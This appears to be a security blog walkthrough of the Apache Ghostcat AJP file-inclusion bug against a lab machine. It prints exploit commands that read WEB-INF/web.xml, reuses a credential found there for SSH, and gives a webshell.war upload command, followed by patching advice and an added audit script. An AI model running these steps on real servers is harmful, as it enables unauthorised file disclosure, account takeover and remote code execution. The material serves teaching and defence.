Hunting and Exploiting the Apache Ghostcat
The Apache Ghostcat vulnerability is a file inclusion vulnerability which came out in the first quarter of this year, while the world was gearing up for a lockdown fight against the coronavirus.
It allows any attacker to read files such as configuration files, test files or any other Tomcat directory files. In addition, if a victim website permits any user to upload files, an attacker can upload a file containing malicious JSP code to the server and then include the uploaded file by exploiting the Ghostcat vulnerability, resulting in remote code execution. Much like the coronavirus family of viruses, the Ghostcat bug has been around for a long time and went undiscovered until the recent past. The aim of this short blog post is to comprehend, identify and exploit this notorious bug.
A Tomcat server generally has several ports set up. There is of course the HTTP web service port, 8080. Then there is another, lesser-known port, 8009, which runs the AJP (Apache JServ Protocol) service. It is essentially a service implemented by Tomcat that allows different operations to be performed.
What is the AJP fuss all about…?
Well, AJP is a binary protocol that reduces overhead for an application server in comparison to HTTP. It is similar to HTTP but at a binary level. Since it is binary, the machine-level translation is far faster than HTTP parsing. In short, the AJP connector is used because:
- It is implemented and exposed by default by Tomcat.
- It gives more persistence, performance and load balancing when reverse proxying requests between front-end and back-end application servers.
- Tomcat's rich API-level implementation encourages developers to push for faster protocol traversal, i.e. HTTP(S) data is seamless and can be retrieved with simple API calls (like the canonical getXYX()).
- AJP allows you to skip the additional parsing and pass efficient binary interpretation of the request headers between the proxy server and the app server.
Ways to detect the Ghostcat vulnerability
1. You can use the online detection tool by the researchers who published the finding. (Link: https://www.chaitin.cn/en/ghostcat)
2. The manual way.
The Manual way of finding it:
As always in any manual penetration test, we perform an Nmap scan to detect open ports.
sh-3.2# nmap -sS -sV -T2 10.10.54.51
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 23:54 IST
Nmap scan report for 10.10.54.51
Host is up (0.19s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp open tcpwrapped
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Apache Tomcat versions 6.x, 7.x, 8.x, and 9.x are found to be vulnerable to this Ghostcat issue.
Once we find the desired ports highlighted in the results above, you can head to this GitHub exploit page: https://github.com/00theway/Ghostcat-CNVD-2020-10487 and run the Python exploit.
sh-3.2# python3 ajpShooter.py http://10.10.54.51:8080/ 8009 /WEB-INF read
[<] 302 302
[<] Location: /index.txt/
[<] Content-Length: 0
We are able to retrieve information. Now we can try to retrieve certain common files from the WEB-INF folder, such as web.xml.
sh-3.2# python3 ajpShooter.py http://10.10.54.51:8080/ 8009 /WEB-INF/web.xml read
[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"1261-1583902632000"
[<] Last-Modified: Wed, 21 Apr 2020 04:57:12 GMT
[<] Content-Type: application/xml
[<] Content-Length: 1261
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to ECorp
ECorp:8730281lkjlkjdqlksalks
</description>
</web-app>
We found a string (8730281lkjlkjdqlksalks) that appears to be a key, which could possibly be used to log in to the system called ECorp via an SSH session.
sh-3.2# ssh ECorp@10.10.54.51
The authenticity of host '10.10.54.51 (10.10.54.51)' can't be established.
ECDSA key fingerprint is SHA256:hNxvmz+AG4q06z8p74FfXZldHr0HJsaa1FBXSoTlnss.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.54.51' (ECDSA) to the list of known hosts.
ECorp@10.10.54.51's password: <enter the key here>
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
ECorp@ubuntu:~$ whoami
ECorp
E-Foundation@ubuntu:/etc$ uname -a
Linux ubuntu 4.4.0-174-generic #204-Ubuntu SMP Wed Apr 29 06:41:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
That's it: we can own the system and retrieve information as the user ECorp, and can also possibly look for root-level escalations if there are any misconfigurations in the system.
If the application server allows uploading files as well, which is uncommon in general, then we can upload WAR files such as:
$ python tomcat.py upload -u tomcat -p tomcat webshell.war 10.10.54.51
and gain code execution using this issue.
More on it here: (https://github.com/hypn0s/AJPy/tree/3854891450e06064b50be1bad6217fd82e5c78e0)
Conclusion:
Ghostcat continues to be one of the severe issues that can be troublesome, just like the coronavirus. Threat actors may mass exploit it using Shodan dorks as well. The suggested mitigation is to disable the port by commenting out the configuration block that enables the AJP connector to listen on port 8009.
It is also recommended to upgrade to the following Apache Tomcat versions, which have applied a patch:
- Apache Tomcat Version 9.0.31
- Apache Tomcat Version 8.5.51
- Apache Tomcat Version 7.0.100
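To check both mitigations on a host you administer, the following added example (not code from the original post or from the Tomcat project) lists AJP connectors that are still enabled in a Tomcat server.xml and compares a version string against the patched releases listed above. The sample server.xml, the function names and the restriction to purely numeric x.y.z version strings are assumptions of this example.

```python
import xml.etree.ElementTree as ET

# First patched release per branch, as listed in this post.
FIXED = {9: (9, 0, 31), 8: (8, 5, 51), 7: (7, 0, 100)}

# Constructed sample server.xml: one live AJP connector, one commented out.
SAMPLE_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
    <!-- <Connector port="8010" protocol="AJP/1.3" redirectPort="8443"/> -->
    <Engine name="Catalina" defaultHost="localhost"/>
  </Service>
</Server>"""


def enabled_ajp_connectors(server_xml):
    """Return (port, address) for each AJP connector that is not commented out.

    ElementTree drops XML comments while parsing, so a connector disabled by
    commenting out its block is never reported. address is None when the
    connector has no address attribute.
    """
    found = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        # Matches "AJP/1.3" as well as org.apache.coyote.ajp.* class names.
        if "ajp" in conn.get("protocol", "HTTP/1.1").lower():
            found.append((conn.get("port"), conn.get("address")))
    return found


def is_vulnerable_version(version):
    """True if a numeric x.y.z Tomcat version predates its branch's patch."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    if parts[0] == 6:
        return True  # 6.x is listed as vulnerable and no patched 6.x is listed
    if parts[0] not in FIXED:
        raise ValueError("branch %d is not covered by the post" % parts[0])
    return parts < FIXED[parts[0]]


def audit(server_xml, version):
    """Combine both checks: exposed means unpatched AND AJP still enabled."""
    connectors = enabled_ajp_connectors(server_xml)
    vulnerable = is_vulnerable_version(version)
    return {"ajp_connectors": connectors, "vulnerable_version": vulnerable,
            "exposed": vulnerable and bool(connectors)}


if __name__ == "__main__":
    # 9.0.30 is the version Nmap reported for the lab host earlier in the post.
    print(audit(SAMPLE_SERVER_XML, "9.0.30"))
```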
For beginners who want to practice such vulnerabilities, there are good platforms such as TryHackme.com that have made excellent machines to solve and understand such new exploits. You can head over there and solve labs based on such vulnerabilities yourself.
Thanks for the read. As always, stay safe and healthy during these corona.war times :}. Peas out.
You can connect with me on :
LinkedIn: www.linkedin.com/in/prakashashok22 and Twitter: https://twitter.com/prakashashok4